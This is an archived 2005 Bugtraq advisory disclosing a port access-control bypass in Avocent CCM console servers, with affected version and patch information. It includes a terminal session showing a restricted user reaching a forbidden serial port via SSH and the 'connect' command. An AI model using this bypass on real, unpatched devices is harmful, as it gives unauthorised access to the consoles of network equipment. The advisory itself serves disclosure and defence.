lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 15 Sep 2005 08:07:45 -0000
From: spam@...etter.org
To: bugtraq@...urityfocus.com
Subject: Avocent CCM: Port Access Control Bypass Vulnerability


Hi,

this is another bug I found during my research on console servers
which is presumably fixed by now. So here you go:


Summary:
Port Access Control Bypass Vulnerability


Details:

Avocents CCM console server have a flaw which enables users to
bypass access control by using ssh with standard password based
authentication. On modern console servers you can set port permissions
per user basis. Research showed however that in this case access control
failed if you ssh directly into the console server with your user account
and then use the "connect" command to access the illegitimate serial
port. Which means that every user can access consoles of every device
hooked up. ssh'ing directly to the tcp port representing the serial port
didn't show this flaw.


Vulnerable Versions:
Tested on S/W Version 2.1, CCM4850


Patches/Workarounds:
Vendor has released firmware 2.3 which according to the vendor fixes
this problem also if the release notes don't mention this. See:

ftp://ftp.avocent.com/public/product-upgrades/$ds1800/CCMx50%20Series/CCMx50%27s_AV_2.3/

"Exploit:"
Design Flaw, exploit not needed. This is for demonstration:


TCP-Port 3101 is -- if enabled serial port 1.
User mylocal should have access only to ports 2 through 48. Direct
access to 3101/tcp is correctly denied. However connecting to the
Avocent first using mylocal account and then use connect command
allows access to this port. In this experiment a cisco switch is
hooked up to serial port 1.

-------- snip


~/console/lab-notizen/avo|19% ssh Admin@ccm
Admin@...'s password:
Avocent CCM4850 S/W Version 2.1


> show user
User:           Admin
Level:          Appliance Administrator
Access:         PALL,USER,SCON,SMON,PCON,BREAK
Groups:
Port Access:    BY PORT
Locked:         N/A
Last Login:     00 10:17:11

Port  Username            Duration      Socket    From Socket
CLI   Admin               00 00:00:04   22        0.0.0.0(58798)
> show user mylocal
User:           mylocal
Level:          User
Access:         P2-48,BREAK
Groups:
Port Access:    BY PORT
Locked:         NO
Last Login:     00 08:10:24
>
>Connection to ccm closed
~/console/lab-notizen/avo|20% ssh mylocal@ccm -p 3101
mylocal@...'s password:
Received disconnect from 192.168.100.209: 2: Access denied - No access to port 1
~/console/lab-notizen/avo|21% ssh mylocal@ccm
mylocal@...'s password:
Avocent CCM4850 S/W Version 2.1


> connect 1
Connected to Port: 1 9600,8,N,1,NONE

cisco#Connection to ccm closed.
~/console/lab-notizen/avo|22%


-------- snap
(see also http://drwetter.org/cs-probs)


Cheers,
        Dirk




--
Dr. Dirk Wetter                                  http://drwetter.org
Consulting IT-Security + Open Source
Key fingerprint = 80A2 742B 8195 969C 5FA6  6584 8B6E 59C1 E41B 9153

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ